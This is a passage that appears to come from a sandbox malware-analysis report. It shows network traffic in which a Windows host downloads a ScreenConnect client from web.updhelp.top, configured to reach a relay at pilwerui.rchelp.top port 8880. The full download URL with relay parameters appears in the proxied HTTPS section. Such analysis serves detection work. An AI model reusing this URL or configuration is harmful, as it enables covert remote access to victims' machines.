                                                                                                                  Apr 12, 2025 17:58:17.155035973 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.155848980 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.155922890 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.155934095 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.155961990 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.155987024 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.156759977 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.156826019 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.156832933 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.156884909 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.156886101 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.156909943 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.156944036 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.157763958 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.157826900 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.157834053 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.157850981 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.157891035 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.157897949 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.157922029 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.158662081 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.158720016 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.158725977 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.158765078 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.158793926 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.158798933 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.158813000 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.159672976 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.159764051 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.159770966 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.159790039 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.159826994 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.159832001 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.159845114 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.160594940 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.160653114 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.160660028 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.160692930 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.160748005 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.160754919 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.161575079 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.161637068 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.161643028 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.161658049 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.161696911 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.161701918 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.161720991 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.162367105 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.162422895 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.162429094 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.162482977 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.162482977 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.162508011 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.162529945 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.163422108 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.163479090 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.163486004 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.163515091 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.163578987 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.163584948 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.164251089 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.164331913 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.164338112 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.164390087 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.164397955 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.164510012 CEST44360859104.21.48.239192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:17.164567947 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:17.164853096 CEST60859443192.168.2.24104.21.48.239
                                                                                                                  Apr 12, 2025 17:58:19.849631071 CEST608618880192.168.2.24217.156.123.36
                                                                                                                  Apr 12, 2025 17:58:20.101815939 CEST888060861217.156.123.36192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:20.101944923 CEST608618880192.168.2.24217.156.123.36
                                                                                                                  Apr 12, 2025 17:58:20.670707941 CEST608618880192.168.2.24217.156.123.36
                                                                                                                  Apr 12, 2025 17:58:20.925107956 CEST888060861217.156.123.36192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:20.956600904 CEST608618880192.168.2.24217.156.123.36
                                                                                                                  Apr 12, 2025 17:58:21.220181942 CEST888060861217.156.123.36192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:21.220375061 CEST888060861217.156.123.36192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:21.220720053 CEST608618880192.168.2.24217.156.123.36
                                                                                                                  Apr 12, 2025 17:58:26.573930025 CEST608618880192.168.2.24217.156.123.36
                                                                                                                  Apr 12, 2025 17:58:26.573973894 CEST608618880192.168.2.24217.156.123.36
                                                                                                                  Apr 12, 2025 17:58:26.573987961 CEST608618880192.168.2.24217.156.123.36
                                                                                                                  Apr 12, 2025 17:58:26.574013948 CEST608618880192.168.2.24217.156.123.36
                                                                                                                  Apr 12, 2025 17:58:26.574037075 CEST608618880192.168.2.24217.156.123.36
                                                                                                                  Apr 12, 2025 17:58:26.826687098 CEST888060861217.156.123.36192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:26.826715946 CEST888060861217.156.123.36192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:26.826805115 CEST608618880192.168.2.24217.156.123.36
                                                                                                                  Apr 12, 2025 17:58:26.826853991 CEST888060861217.156.123.36192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:27.079489946 CEST888060861217.156.123.36192.168.2.24
                                                                                                                  Apr 12, 2025 17:59:27.083865881 CEST888060861217.156.123.36192.168.2.24
                                                                                                                  Apr 12, 2025 17:59:27.083944082 CEST608618880192.168.2.24217.156.123.36
                                                                                                                  Apr 12, 2025 17:59:27.086419106 CEST608618880192.168.2.24217.156.123.36
                                                                                                                  Apr 12, 2025 17:59:27.338645935 CEST888060861217.156.123.36192.168.2.24

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Apr 12, 2025 17:57:55.970935106 CEST6247353192.168.2.241.1.1.1
                                                                                                                  Apr 12, 2025 17:57:56.154630899 CEST53624731.1.1.1192.168.2.24
                                                                                                                  Apr 12, 2025 17:58:19.610704899 CEST5046153192.168.2.241.1.1.1
                                                                                                                  Apr 12, 2025 17:58:19.815500975 CEST53504611.1.1.1192.168.2.24

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Apr 12, 2025 17:57:55.970935106 CEST192.168.2.241.1.1.10xe756Standard query (0)web.updhelp.topA (IP address)IN (0x0001)false
                                                                                                                  Apr 12, 2025 17:58:19.610704899 CEST192.168.2.241.1.1.10x1e0bStandard query (0)pilwerui.rchelp.topA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Apr 12, 2025 17:57:56.154630899 CEST1.1.1.1192.168.2.240xe756No error (0)web.updhelp.top104.21.48.239A (IP address)IN (0x0001)false
                                                                                                                  Apr 12, 2025 17:57:56.154630899 CEST1.1.1.1192.168.2.240xe756No error (0)web.updhelp.top172.67.157.1A (IP address)IN (0x0001)false
                                                                                                                  Apr 12, 2025 17:58:03.495881081 CEST1.1.1.1192.168.2.240xd4cfNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                  Apr 12, 2025 17:58:03.495881081 CEST1.1.1.1192.168.2.240xd4cfNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                  Apr 12, 2025 17:58:16.091725111 CEST1.1.1.1192.168.2.240x7c13No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                  Apr 12, 2025 17:58:16.091725111 CEST1.1.1.1192.168.2.240x7c13No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                  Apr 12, 2025 17:58:19.815500975 CEST1.1.1.1192.168.2.240x1e0bNo error (0)pilwerui.rchelp.top217.156.123.36A (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • web.updhelp.top

                                                                                                                  HTTPS Proxied Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.2460842104.21.48.2394432084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-04-12 15:57:57 UTC627OUTGET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pilwerui.rchelp.top&p=8880&s=577cfc54-82b0-4777-83f3-37207b6e5fc8&k=BgIAAACkAABSU0ExAAgAAAEAAQCFVe49RH8w3PHHeO1qVSBr4d2sU0V6TqcGbDS6EEXrvVeV3soat%2b%2be7pjtKgmoYVSxtAgqBJFx3x%2bu%2fgeS2gMoW6pxHqHTQdkVPR3tWAED4PaXMyxSCsVfvS5x%2bD6HmCLs68MhV46R8MZKmo1TFlrWJa1YjjBBiNyTHb6vMp5bwAw6SBn7qSa3OLCFvKac77ooLhGXIKHPll7r9fHyHomHZ7Cy6UiZo%2fLH1m0xtJUlwQCrw8XCJdG%2ffBozmN8eL%2b%2bm0Fofhb08PSqX8fRwaZBpCsqRtXK2fd128aH7mu%2be2Q2vOc7WrnUjiGs7o7fZ9oSw384B%2f9gNelOJnoEsAbyt&r=&i=Untitled%20Session HTTP/1.1
                                                                                                                  Host: web.updhelp.top
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-04-12 15:57:58 UTC965INHTTP/1.1 200 OK
                                                                                                                  Date: Sat, 12 Apr 2025 15:57:58 GMT
                                                                                                                  Content-Type: application/x-ms-application; charset=utf-8
                                                                                                                  Content-Length: 168849
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: private
                                                                                                                  x-robots-tag: noindex
                                                                                                                  x-content-type-options: nosniff
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zl2ALBX6J%2F%2BQrCBCyxdq4ufDdSq7p5zk6pSmRtuvFKr0vN6SwVWJz7NqiwXtfFG%2BLs64JJ5bo%2F5k66wzKwgA4xHJ%2BmNDnNr1z5KDE2Trlh4q01YgymdLdpK2hlTCPFGyujU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 92f3ec247ef532f3-JAX
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=112541&min_rtt=112410&rtt_var=23766&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1218&delivery_rate=35879&cwnd=252&unsent_bytes=0&cid=43141cd3ab15f858&ts=2040&x=0"
                                                                                                                  2025-04-12 15:57:58 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
                                                                                                                  2025-04-12 15:57:58 UTC1369INData Raw: 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 33 22 20 78 6d 6c 6e 73 3a 64 73 69 67 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 22 20 78 6d 6c 6e 73 3a 63 6f 2e 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 63 6c 69 63 6b 6f 6e 63 65 2e 76 31 22 20 78 6d 6c 6e 73 3a 63 6f 2e 76 32 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 63 6c 69 63 6b 6f 6e 63 65 2e 76 32 22 3e 0d 0a 20 20 3c 61 73 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 6e 61 6d 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 43 6c 69 65 6e 74 2e 61 70 70 6c 69 63 61 74 69 6f 6e 22
                                                                                                                  Data Ascii: rn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2"> <assemblyIdentity name="ScreenConnect.WindowsClient.application"
                                                                                                                  2025-04-12 15:57:58 UTC1369INData Raw: 56 65 72 73 69 6f 6e 3d 22 34 2e 30 22 20 70 72 6f 66 69 6c 65 3d 22 43 6c 69 65 6e 74 22 20 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 3d 22 34 2e 30 2e 33 30 33 31 39 22 20 2f 3e 3c 2f 63 6f 6d 70 61 74 69 62 6c 65 46 72 61 6d 65 77 6f 72 6b 73 3e 3c 70 75 62 6c 69 73 68 65 72 49 64 65 6e 74 69 74 79 20 6e 61 6d 65 3d 22 43 4e 3d 26 71 75 6f 74 3b 43 6f 6e 6e 65 63 74 77 69 73 65 2c 20 4c 4c 43 26 71 75 6f 74 3b 2c 20 4f 3d 26 71 75 6f 74 3b 43 6f 6e 6e 65 63 74 77 69 73 65 2c 20 4c 4c 43 26 71 75 6f 74 3b 2c 20 4c 3d 54 61 6d 70 61 2c 20 53 3d 46 6c 6f 72 69 64 61 2c 20 43 3d 55 53 22 20 69 73 73 75 65 72 4b 65 79 48 61 73 68 3d 22 36 38 33 37 65 30 65 62 62 36 33 62 66 38 35 66 31 31 38 36 66 62 66 65 36 31 37 62 30 38 38 38 36 35 66 34 34 65 34
                                                                                                                  Data Ascii: Version="4.0" profile="Client" supportedRuntime="4.0.30319" /></compatibleFrameworks><publisherIdentity name="CN=&quot;Connectwise, LLC&quot;, O=&quot;Connectwise, LLC&quot;, L=Tampa, S=Florida, C=US" issuerKeyHash="6837e0ebb63bf85f1186fbfe617b088865f44e4
                                                                                                                  2025-04-12 15:57:58 UTC1369INData Raw: 54 63 47 31 4c 67 6f 65 39 64 55 55 6f 68 79 4b 79 48 58 2b 68 38 46 41 4d 4c 6d 43 74 63 4d 55 4d 4c 56 79 62 30 66 64 65 45 52 4b 7a 76 72 64 5a 68 7a 4b 4c 78 76 43 67 75 56 62 37 6b 62 65 70 4d 4e 52 44 70 4f 69 33 71 32 51 43 4b 4a 4d 39 61 30 36 65 79 2b 66 38 32 44 78 74 43 4d 4e 47 62 39 34 67 6d 4c 65 41 6f 62 49 4e 4f 79 69 52 52 65 6d 4c 61 66 63 69 6a 61 6d 51 77 37 69 72 64 6c 59 45 62 64 5a 76 2f 48 35 69 4a 67 44 4f 76 50 78 43 6a 6d 38 6d 4b 6e 54 48 68 62 52 56 66 4b 37 7a 30 51 3d 3c 2f 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 3c 4b 65 79 49 6e 66 6f 20 49 64 3d 22 53 74 72 6f 6e 67 4e 61 6d 65 4b 65 79 49 6e 66 6f 22 3e 3c 4b 65 79 56 61 6c 75 65 3e 3c 52 53 41 4b 65 79 56 61 6c 75 65 3e 3c 4d 6f 64 75 6c 75 73 3e 37 45 69 59 4a 74
                                                                                                                  Data Ascii: TcG1Lgoe9dUUohyKyHX+h8FAMLmCtcMUMLVyb0fdeERKzvrdZhzKLxvCguVb7kbepMNRDpOi3q2QCKJM9a06ey+f82DxtCMNGb94gmLeAobINOyiRRemLafcijamQw7irdlYEbdZv/H5iJgDOvPxCjm8mKnTHhbRVfK7z0Q=</SignatureValue><KeyInfo Id="StrongNameKeyInfo"><KeyValue><RSAKeyValue><Modulus>7EiYJt
                                                                                                                  2025-04-12 15:57:58 UTC1369INData Raw: 22 20 76 65 72 73 69 6f 6e 3d 22 32 34 2e 34 2e 34 2e 39 31 31 38 22 20 70 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 22 32 35 62 30 66 62 62 36 65 66 37 65 62 30 39 34 22 20 6c 61 6e 67 75 61 67 65 3d 22 6e 65 75 74 72 61 6c 22 20 70 72 6f 63 65 73 73 6f 72 41 72 63 68 69 74 65 63 74 75 72 65 3d 22 6d 73 69 6c 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 2f 3e 3c 2f 61 73 3a 4d 61 6e 69 66 65 73 74 49 6e 66 6f 72 6d 61 74 69 6f 6e 3e 3c 61 73 3a 53 69 67 6e 65 64 42 79 20 2f 3e 3c 61 73 3a 41 75 74 68 65 6e 74 69 63 6f 64 65 50 75 62 6c 69 73 68 65 72 3e 3c 61 73 3a 58 35 30 39 53 75 62 6a 65 63 74 4e 61 6d 65 3e 43 4e 3d 22 43 6f 6e 6e 65 63 74 77 69 73 65 2c 20 4c 4c 43
                                                                                                                  Data Ascii: " version="24.4.4.9118" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" /></as:ManifestInformation><as:SignedBy /><as:AuthenticodePublisher><as:X509SubjectName>CN="Connectwise, LLC
                                                                                                                  2025-04-12 15:57:58 UTC1369INData Raw: 58 36 50 6d 34 64 2b 73 4d 48 55 59 6c 6f 30 53 68 36 71 4c 47 64 70 73 46 6a 65 58 49 66 34 30 77 35 6d 54 45 2b 33 50 32 5a 66 46 33 7a 6c 69 52 56 6b 4f 61 43 36 46 78 76 61 33 38 6a 77 75 58 6a 71 63 68 6e 32 48 43 75 70 5a 4f 79 32 76 66 73 63 51 43 30 6a 68 6e 52 52 42 6c 76 73 76 5a 77 39 70 6d 4a 44 7a 7a 54 33 7a 69 62 53 73 68 63 39 50 6e 6a 51 69 6f 6c 62 4c 44 52 54 66 64 4a 4b 6e 49 67 58 6f 52 6b 56 61 45 56 62 39 41 41 48 4d 4a 61 4c 79 39 30 69 34 51 68 48 51 42 39 79 6e 6e 72 2f 76 59 4c 68 66 35 7a 67 43 47 6d 45 6e 46 43 79 52 77 33 69 72 2f 52 73 54 38 35 34 37 51 4a 54 41 55 67 30 58 59 31 59 58 69 62 34 64 30 41 67 53 44 71 36 4c 78 33 6e 77 76 58 6c 74 68 51 74 55 73 38 52 42 36 4d 69 30 4b 6f 74 52 65 59 71 67 63 36 50 64 64 73 55
                                                                                                                  Data Ascii: X6Pm4d+sMHUYlo0Sh6qLGdpsFjeXIf40w5mTE+3P2ZfF3zliRVkOaC6Fxva38jwuXjqchn2HCupZOy2vfscQC0jhnRRBlvsvZw9pmJDzzT3zibSshc9PnjQiolbLDRTfdJKnIgXoRkVaEVb9AAHMJaLy90i4QhHQB9ynnr/vYLhf5zgCGmEnFCyRw3ir/RsT8547QJTAUg0XY1YXib4d0AgSDq6Lx3nwvXlthQtUs8RB6Mi0KotReYqgc6PddsU
                                                                                                                  2025-04-12 15:57:58 UTC1369INData Raw: 55 45 42 68 4d 43 56 56 4d 78 45 44 41 4f 42 67 4e 56 42 41 67 54 42 30 5a 73 62 33 4a 70 5a 47 45 78 44 6a 41 4d 42 67 4e 56 42 41 63 54 42 56 52 68 62 58 42 68 4d 52 6b 77 46 77 59 44 56 51 51 4b 45 78 42 44 62 32 35 75 5a 57 4e 30 64 32 6c 7a 5a 53 77 67 54 45 78 44 4d 52 6b 77 46 77 59 44 56 51 51 44 45 78 42 44 62 32 35 75 5a 57 4e 30 64 32 6c 7a 5a 53 77 67 54 45 78 44 4d 49 49 43 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 67 38 41 4d 49 49 43 43 67 4b 43 41 67 45 41 37 45 69 59 4a 74 43 4e 4c 47 33 69 47 7a 7a 54 5a 32 32 78 34 4f 55 4d 73 66 39 31 2f 31 5a 4f 6c 30 48 35 56 30 71 6a 5a 41 71 6f 4b 58 4b 55 6f 46 74 4e 74 6f 71 39 42 32 43 32 73 46 74 51 7a 70 4c 2f 51 71 54 6a 6b 4c 35 33 61 6b 50 70 6c 68 78 79 4c
                                                                                                                  Data Ascii: UEBhMCVVMxEDAOBgNVBAgTB0Zsb3JpZGExDjAMBgNVBAcTBVRhbXBhMRkwFwYDVQQKExBDb25uZWN0d2lzZSwgTExDMRkwFwYDVQQDExBDb25uZWN0d2lzZSwgTExDMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA7EiYJtCNLG3iGzzTZ22x4OUMsf91/1ZOl0H5V0qjZAqoKXKUoFtNtoq9B2C2sFtQzpL/QqTjkL53akPplhxyL
                                                                                                                  2025-04-12 15:57:58 UTC1369INData Raw: 42 42 51 55 48 4d 41 47 47 47 47 68 30 64 48 41 36 4c 79 39 76 59 33 4e 77 4c 6d 52 70 5a 32 6c 6a 5a 58 4a 30 4c 6d 4e 76 62 54 42 63 42 67 67 72 42 67 45 46 42 51 63 77 41 6f 5a 51 61 48 52 30 63 44 6f 76 4c 32 4e 68 59 32 56 79 64 48 4d 75 5a 47 6c 6e 61 57 4e 6c 63 6e 51 75 59 32 39 74 4c 30 52 70 5a 32 6c 44 5a 58 4a 30 56 48 4a 31 63 33 52 6c 5a 45 63 30 51 32 39 6b 5a 56 4e 70 5a 32 35 70 62 6d 64 53 55 30 45 30 4d 44 6b 32 55 30 68 42 4d 7a 67 30 4d 6a 41 79 4d 55 4e 42 4d 53 35 6a 63 6e 51 77 44 41 59 44 56 52 30 54 41 51 48 2f 42 41 49 77 41 44 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 73 46 41 41 4f 43 41 67 45 41 43 74 65 66 41 4d 39 4a 68 49 5a 4d 69 59 48 73 7a 6f 63 59 71 6f 64 57 52 2f 61 6e 52 67 6a 4a 61 4f 46 6c 61 4d 65 71 6e 58
                                                                                                                  Data Ascii: BBQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBcBggrBgEFBQcwAoZQaHR0cDovL2NhY2VydHMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0VHJ1c3RlZEc0Q29kZVNpZ25pbmdSU0E0MDk2U0hBMzg0MjAyMUNBMS5jcnQwDAYDVR0TAQH/BAIwADANBgkqhkiG9w0BAQsFAAOCAgEACtefAM9JhIZMiYHszocYqodWR/anRgjJaOFlaMeqnX
                                                                                                                  2025-04-12 15:57:58 UTC1369INData Raw: 64 55 35 57 52 75 78 69 45 4c 31 4d 34 7a 72 50 59 47 58 63 4d 57 37 78 49 55 6d 4d 4a 2b 6b 6a 6d 6a 59 58 50 58 72 4e 43 51 48 34 55 74 50 30 33 68 44 39 42 66 58 48 74 72 35 30 74 56 6e 47 6c 4a 50 44 71 46 58 2f 49 69 5a 77 5a 48 4d 67 51 4d 2b 54 58 41 6b 5a 4c 4f 4e 34 67 68 39 4e 48 31 4d 67 46 63 53 61 30 4f 61 6d 66 4c 46 4f 78 2f 79 37 38 74 48 57 68 4f 6d 54 4c 4d 42 49 43 58 7a 45 4e 4f 4c 73 76 73 49 38 49 72 67 6e 51 6e 41 5a 61 66 36 6d 49 42 4a 4e 59 63 39 55 52 6e 6f 6b 43 46 34 52 53 36 68 6e 79 7a 68 47 4d 49 61 7a 4d 58 75 6b 30 6c 77 51 6a 4b 50 2b 38 62 71 48 50 4e 6c 61 4a 47 69 54 55 79 43 45 55 68 53 61 4e 34 51 76 52 52 58 58 65 67 59 45 32 58 46 66 37 4a 50 68 53 78 49 70 46 61 45 4e 64 62 35 4c 70 79 71 41 42 58 52 4e 2f 34 61
                                                                                                                  Data Ascii: dU5WRuxiEL1M4zrPYGXcMW7xIUmMJ+kjmjYXPXrNCQH4UtP03hD9BfXHtr50tVnGlJPDqFX/IiZwZHMgQM+TXAkZLON4gh9NH1MgFcSa0OamfLFOx/y78tHWhOmTLMBICXzENOLsvsI8IrgnQnAZaf6mIBJNYc9URnokCF4RS6hnyzhGMIazMXuk0lwQjKP+8bqHPNlaJGiTUyCEUhSaN4QvRRXXegYE2XFf7JPhSxIpFaENdb5LpyqABXRN/4a
